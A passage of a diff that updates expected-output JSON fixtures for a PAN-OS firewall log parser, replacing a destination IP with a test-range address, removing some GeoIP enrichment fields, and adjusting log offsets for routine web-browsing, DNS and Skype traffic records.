+        "network.community_id": "1:tf34cPo413Ta9avfHZIP6b5DHXc=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -2202,14 +2096,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -2233,14 +2127,7 @@
         "client.port": 57322,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 98,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 1,
         "destination.port": 53,
@@ -2266,7 +2153,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 8065,
+        "log.offset": 8033,
         "network.application": "dns",
         "network.bytes": 164,
         "network.community_id": "1:GjCL7PEzM4X3r7frQ42mW+tNEIQ=",
@@ -2331,19 +2218,15 @@
         "client.packets": 6,
         "client.port": 59204,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -2356,7 +2239,7 @@
         "event.end": "2012-04-10T04:39:26.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:26.000-02:00",
         "event.timezone": "-02:00",
@@ -2368,10 +2251,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 8418,
+        "log.offset": 8386,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:2+g5+FYJDJku+1Cl3ZbhVCYdAog=",
+        "network.community_id": "1:XrXJKzav0NPbbETBjwAeI3kQZUo=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -2403,14 +2286,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -2433,19 +2316,15 @@
         "client.packets": 6,
         "client.port": 59203,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -2458,7 +2337,7 @@
         "event.end": "2012-04-10T04:39:26.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:26.000-02:00",
         "event.timezone": "-02:00",
@@ -2470,10 +2349,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 8803,
+        "log.offset": 8769,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:+ENVPObTW4uBLTLg/Gs7oB3/t0E=",
+        "network.community_id": "1:1KQZF73ZpXY01SATsJ3TT+frjzA=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -2505,14 +2384,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -2535,19 +2414,15 @@
         "client.packets": 1,
         "client.port": 59305,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -2560,7 +2435,7 @@
         "event.end": "2012-04-10T04:39:56.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:56.000-02:00",
         "event.timezone": "-02:00",
@@ -2572,10 +2447,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 9188,
+        "log.offset": 9152,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:TPp8b1ubMhxmeJWRt0DCagjd7jA=",
+        "network.community_id": "1:4EImQ9QUHZ6aQjNmpPlX5dryAZg=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -2607,14 +2482,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -2638,14 +2513,7 @@
         "client.port": 64005,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -2671,7 +2539,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 9552,
+        "log.offset": 9514,
         "network.application": "dns",
         "network.bytes": 69,
         "network.community_id": "1:9xSXx0HsnsbhZkZ6kFjNeIn1Aw8=",
@@ -2737,14 +2605,7 @@
         "client.port": 58768,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -2770,7 +2631,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 9905,
+        "log.offset": 9867,
         "network.application": "dns",
         "network.bytes": 69,
         "network.community_id": "1:Ukie7FwgRVUkTl4/hKbkxseBqj0=",
@@ -2836,17 +2697,7 @@
         "client.port": 47752,
         "client.user.name": "crusher",
         "destination.address": "98.149.55.63",
-        "destination.as.number": 20001,
-        "destination.as.organization.name": "Charter Communications Inc",
         "destination.bytes": 504,
-        "destination.geo.city_name": "Westminster",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 33.7518,
-        "destination.geo.location.lon": -117.9932,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "98.149.55.63",
         "destination.packets": 8,
         "destination.port": 13069,
@@ -2872,7 +2723,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 10258,
+        "log.offset": 10220,
         "network.application": "skype",
         "network.bytes": 1008,
         "network.community_id": "1:7+CQvC/DGk2fhUdWzglWwYXYMZE=",
@@ -2937,19 +2788,15 @@
         "client.packets": 1,
         "client.port": 59304,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -2962,7 +2809,7 @@
         "event.end": "2012-04-10T04:39:55.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:55.000-02:00",
         "event.timezone": "-02:00",
@@ -2974,10 +2821,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 10624,
+        "log.offset": 10586,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=",
+        "network.community_id": "1:JJMt5TnGAbJ3hOj5OyWJMZSrCkI=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -3009,14 +2856,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -3040,14 +2887,7 @@
         "client.port": 54533,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -3073,7 +2913,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 10988,
+        "log.offset": 10948,
         "network.application": "dns",
         "network.bytes": 71,
         "network.community_id": "1:x/kpg5sNW5nn7RkabTWPIKsvO58=",
@@ -3139,17 +2979,7 @@
         "client.port": 59201,
         "client.user.name": "crusher",
         "destination.address": "212.48.10.58",
-        "destination.as.number": 8660,
-        "destination.as.organization.name": "Italiaonline S.p.A.",
         "destination.bytes": 9130,
-        "destination.geo.city_name": "Assago",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 45.4087,
-        "destination.geo.location.lon": 9.1225,
-        "destination.geo.region_iso_code": "IT-MI",
-        "destination.geo.region_name": "Milan",
         "destination.ip": "212.48.10.58",
         "destination.packets": 10,
         "destination.port": 80,
@@ -3175,7 +3005,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 11341,
+        "log.offset": 11301,
         "network.application": "web-browsing",
         "network.bytes": 9967,
         "network.community_id": "1:GL6UBrkzpi/gQHrUyqxHb1jJeUU=",
@@ -3240,19 +3070,15 @@
         "client.packets": 1,
         "client.port": 59303,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -3265,7 +3091,7 @@
         "event.end": "2012-04-10T04:39:55.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:55.000-02:00",
         "event.timezone": "-02:00",
@@ -3277,10 +3103,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 11713,
+        "log.offset": 11673,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=",
+        "network.community_id": "1:zikh1dISky6Bvrt3EQgtSiB7tFM=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -3312,14 +3138,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -3343,14 +3169,7 @@
         "client.port": 50876,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -3376,7 +3195,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 12077,
+        "log.offset": 12035,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:TuGe54F1FJdU+mNdTf97Ced2UmI=",
@@ -3442,14 +3261,7 @@
         "client.port": 57657,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -3475,7 +3287,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 12430,
+        "log.offset": 12388,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:1yn57zVSr0UsUwbuL7XvzIWMbpM=",
@@ -3540,19 +3352,15 @@
         "client.packets": 1,
         "client.port": 59302,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -3565,7 +3373,7 @@
         "event.end": "2012-04-10T04:39:54.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:54.000-02:00",
         "event.timezone": "-02:00",
@@ -3577,10 +3385,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 12783,
+        "log.offset": 12741,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=",
+        "network.community_id": "1:vAUMECfwOw0ZMjDh547rBQbLCC0=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -3612,14 +3420,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -3642,19 +3450,15 @@
         "client.packets": 1,
         "client.port": 59301,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -3667,7 +3471,7 @@
         "event.end": "2012-04-10T04:39:54.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:54.000-02:00",
         "event.timezone": "-02:00",
@@ -3679,10 +3483,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 13147,
+        "log.offset": 13103,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=",
+        "network.community_id": "1:NUjNq/OVSu47ikA9lKKSraDM5HU=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -3714,14 +3518,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -3745,14 +3549,7 @@
         "client.port": 64844,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -3778,7 +3575,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 13511,
+        "log.offset": 13465,
         "network.application": "dns",
         "network.bytes": 80,
         "network.community_id": "1:SxifLhXvL8EiCuMvSbDcRARZyRw=",
@@ -3844,14 +3641,7 @@
         "client.port": 52257,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -3877,7 +3667,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
